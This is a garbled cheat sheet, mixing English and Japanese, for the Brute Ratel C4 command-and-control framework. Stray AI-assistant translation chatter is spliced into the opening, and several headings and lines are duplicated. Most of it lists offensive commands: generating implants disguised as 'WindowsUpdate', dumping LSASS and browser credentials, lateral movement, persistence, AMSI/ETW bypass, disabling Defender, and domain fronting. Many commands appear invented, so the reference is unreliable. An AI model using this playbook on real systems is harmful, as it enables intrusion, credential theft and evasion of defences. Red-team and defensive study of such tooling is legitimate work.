Activate license (requires valid license key)

Translate only the first section (#1) Wait for you to provide the full text```bash

Activate license (requires valid license key)

./brc4 —activate

Verify license status

./brc4 —license-info

Update license

./brc4 —update-license


For now, I'll translate the first section and the overview:
```bash
# Start BRc4 server
./brc4 --server

# Start with custom configuration
./brc4 --server --config /path/to/config.json

# Start with specific interface
./brc4 --server --interface 0.0.0.0 --port 443
```# Brute Ratel C4 フレームワーク チートシート

## 概要

Brute Ratel C4 (BRc4) は、レッドチーム作戦と敵対者シミュレーション用に設計された商用のカスタマイズされたコマンド＆コントロール（C2）フレームワークです。高度な回避機能、洗練されたポストエクスプロイト機能、プロフェッショナルレベルの運用セキュリティを提供します。

> ⚠️ **警告**: これは有効なライセンスが必要な商用ツールです。このツールは、承認されたペネトレーションテストとレッドチーム演習のみを目的としています。任意の環境で使用する前に、適切な承認を確実に得てください。

Would you like me to continue with the rest of the sections, or do you want to provide the full text first?
| コマンド | 説明 |
|---------|-------------|
| `help` | ヘルプメニューを表示 |
| `version` | バージョン情報を表示 |
| `listeners` | アクティブなリスナーを一覧表示 |
| `badgers` | 接続されたバジャー（エージェント）のリスト |
| `operators` | 接続された演算子の一覧 |
| `exit` | BRc4サーバーから退出 |
### Listener Management
| コマンド | 説明 |
|---------|-------------|
| `listener http` | HTTPリスナーを作成 |
| `listener https` | HTTPS リスナーを作成 |
| `listener dns` | DNS リスナーを作成 |
| `listener tcp` | TCPリスナーを作成 |
| `listener smb` | SMBリスナーを作成 |
| `listener stop <id>` | リスナーを停止 |
### Badger (Agent) Management
| コマンド | 説明 |
|---------|-------------|
| `badger <id>` | バッジャーと対話する |
| `badger kill <id>` | バジャーを殺す |
| `badger sleep <time>` | スリープ間隔を設定 |
| `badger jitter <percentage>` | ジッター率を設定 |
| `badger proxy <proxy>` | badgerのプロキシを設定 |
## Listener Configuration

### HTTP/HTTPS Listeners
```bash
# Create HTTPS listener
listener https
set host 0.0.0.0
set port 443
set cert /path/to/cert.pem
set key /path/to/key.pem
set malleable /path/to/profile.profile
start

# Create HTTP listener with domain fronting
listener http
set host 0.0.0.0
set port 80
set front-domain cdn.example.com
set host-header legitimate-site.com
start

DNS Listener

# Create DNS listener
listener dns
set domain example.com
set nameserver ns1.example.com
set port 53
start

SMB Listener

# Create SMB listener
listener smb
set pipename msagent_pipe
set host 0.0.0.0
set port 445
start

TCP Listener

# Create TCP listener
listener tcp
set host 0.0.0.0
set port 4444
set bind true
start

Badger Generation

Windows Badgers

# Generate Windows executable
generate windows exe
set listener https-443
set arch x64
set format exe
set output windows_badger.exe
generate

# Generate Windows DLL
generate windows dll
set listener https-443
set arch x64
set format dll
set output windows_badger.dll
generate

# Generate Windows service
generate windows service
set listener https-443
set arch x64
set service-name "WindowsUpdate"
set output windows_service.exe
generate

Linux Badgers

# Generate Linux ELF
generate linux elf
set listener https-443
set arch x64
set format elf
set output linux_badger
generate

# Generate Linux shared library
generate linux so
set listener https-443
set arch x64
set format so
set output linux_badger.so
generate

macOS Badgers

# Generate macOS binary
generate macos macho
set listener https-443
set arch x64
set format macho
set output macos_badger
generate

# Generate macOS application
generate macos app
set listener https-443
set arch x64
set app-name "Updater"
set output macos_app.app
generate

Post-Exploitation Commands

System Information

# Get system information
sysinfo

# Get current user
whoami

# Get privileges
getprivs

# Get environment variables
env

# Get network interfaces
ifconfig

File Operations

# List directory
ls /path/to/directory

# Change directory
cd /path/to/directory

# Download file
download /remote/path/file.txt

# Upload file
upload /local/path/file.txt /remote/path/

# Execute file
execute /path/to/executable

# Delete file
rm /path/to/file

Process Management

# List processes
ps

# Kill process
kill <pid>

# Migrate to process
migrate <pid>

# Inject into process
inject <pid> <payload>

# Create process
spawn <executable>

Network Operations

# Network connections
netstat

# ARP table
arp

# Routing table
route

# Port scan
portscan 192.168.1.0/24 80,443,3389

# Ping sweep
ping 192.168.1.0/24

Advanced Features

Malleable C2 Profiles

# Load malleable profile
set malleable /path/to/profile.profile

# Custom HTTP profile
http-get \\\\{
    set uri "/api/v1/status";
    client \\\\{
        header "User-Agent" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)";
        header "Accept" "application/json";
    \\\\}
    server \\\\{
        header "Content-Type" "application/json";
        output \\\\{
            print;
        \\\\}
    \\\\}
\\\\}

Process Injection Techniques

# Classic DLL injection
inject-dll <pid> /path/to/dll.dll

# Process hollowing
hollow <target-process> <payload>

# Reflective DLL loading
reflective-dll /path/to/dll.dll

# Manual DLL mapping
map-dll <pid> /path/to/dll.dll

# Thread hijacking
hijack-thread <pid> <payload>

Credential Harvesting

# Dump LSASS
lsass-dump

# Mimikatz integration
mimikatz sekurlsa::logonpasswords

# SAM dump
sam-dump

# LSA secrets
lsa-secrets

# Cached credentials
cache-dump

# Browser credentials
browser-creds

Lateral Movement

# WMI execution
wmi-exec 192.168.1.10 "whoami"

# PSExec
psexec 192.168.1.10 "whoami"

# SMB execution
smb-exec 192.168.1.10 "whoami"

# DCOM execution
dcom-exec 192.168.1.10 "whoami"

# WinRM execution
winrm-exec 192.168.1.10 "whoami"

Persistence Mechanisms

# Registry persistence
persist-registry HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "Update" "C:\temp\badger.exe"

# Scheduled task
persist-task "WindowsUpdate" "C:\temp\badger.exe" daily

# Service persistence
persist-service "UpdateService" "C:\temp\badger.exe"

# WMI persistence
persist-wmi "ProcessStart" "C:\temp\badger.exe"

# Startup folder
persist-startup "C:\temp\badger.exe"

Evasion Techniques

Anti-Analysis

# VM detection
vm-detect

# Sandbox evasion
sandbox-evasion

# Debugger detection
debugger-detect

# Sleep evasion
sleep-evasion 300

# User interaction check
user-interaction

AMSI/ETW Bypass

# AMSI bypass
amsi-bypass

# ETW bypass
etw-bypass

# Disable Windows Defender
disable-defender

# Unhook DLLs
unhook-dlls

# Patch AMSI
patch-amsi

Traffic Obfuscation

# Domain fronting
set front-domain cdn.cloudflare.com
set host-header legitimate-site.com

# Custom User-Agent
set user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"

# Custom headers
set headers "X-Forwarded-For: 192.168.1.100"

# Proxy chains
set proxy-chain "http://proxy1:8080,socks5://proxy2:1080"

Payload Obfuscation

# Encrypt payload
encrypt-payload aes256 <key>

# Obfuscate strings
obfuscate-strings

# Pack executable
pack-exe upx

# Sign executable
sign-exe /path/to/cert.pfx

# Polymorphic generation
polymorphic-gen

Operational Security

Communication Security

# Use encrypted channels
set encryption aes256

# Certificate pinning
set cert-pinning true

# Custom TLS configuration
set tls-version 1.3
set cipher-suite ECDHE-RSA-AES256-GCM-SHA384

# Jitter configuration
set jitter 20
set jitter-type random

Infrastructure Management

# Redirector setup
set redirector nginx
set upstream-server 192.168.1.100:443

# Load balancing
set load-balancer round-robin
set backend-servers "192.168.1.100,192.168.1.101"

# Failover configuration
set failover-servers "backup1.com,backup2.com"

Logging and Monitoring

# Enable detailed logging
set log-level debug
set log-file /var/log/brc4.log

# Operator tracking
set operator-logging true

# Command auditing
set command-audit true

# Session recording
set session-recording true

Team Operations

Multi-Operator Support

# Add operator
operator add username password

# Set operator permissions
operator permissions username read,write,execute

# Operator sessions
operator sessions

# Kick operator
operator kick username

Collaboration Features

# Share badger session
share-session <badger-id> <operator>

# Session notes
note-add "Important finding"
note-list
note-delete <note-id>

# Team chat
chat "Message to team"
chat-history

Troubleshooting

Connection Issues

# Test listener
test-listener <listener-id>

# Check connectivity
test-connectivity <target>

# Verify certificates
verify-cert /path/to/cert.pem

# Debug mode
set debug true

Badger Issues

# Badger health check
health-check <badger-id>

# Reset badger
reset-badger <badger-id>

# Badger diagnostics
diagnostics <badger-id>

# Force reconnect
reconnect <badger-id>

Performance Optimization

# Optimize sleep intervals
set sleep-optimization true

# Bandwidth throttling
set bandwidth-limit 1024

# Connection pooling
set connection-pooling true

# Compression
set compression gzip

Configuration

Server Configuration

\\\\{
  "server": \\\\{
    "host": "0.0.0.0",
    "port": 443,
    "ssl": true,
    "cert": "/path/to/cert.pem",
    "key": "/path/to/key.pem"
  \\\\},
  "database": \\\\{
    "type": "sqlite",
    "path": "/opt/brc4/database.db"
  \\\\},
  "logging": \\\\{
    "level": "info",
    "file": "/var/log/brc4.log"
  \\\\}
\\\\}

Malleable Profile

# Custom malleable profile
set sample_name "Custom Profile";
set sleeptime "30000";
set jitter "20";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)";

http-get \\\\{
    set uri "/api/status";
    client \\\\{
        header "Accept" "application/json";
        header "Accept-Language" "en-US,en;q=0.9";
    \\\\}
    server \\\\{
        header "Content-Type" "application/json";
        output \\\\{
            print;
        \\\\}
    \\\\}
\\\\}

Resources

このチートシートは、Brute Ratel C4 の使用に関する包括的なリファレンスを提供します。これは商用ツールであり、適切なライセンスが必要です。どの環境でもこのツールを使用する前に、必ず適切な承認を得てください。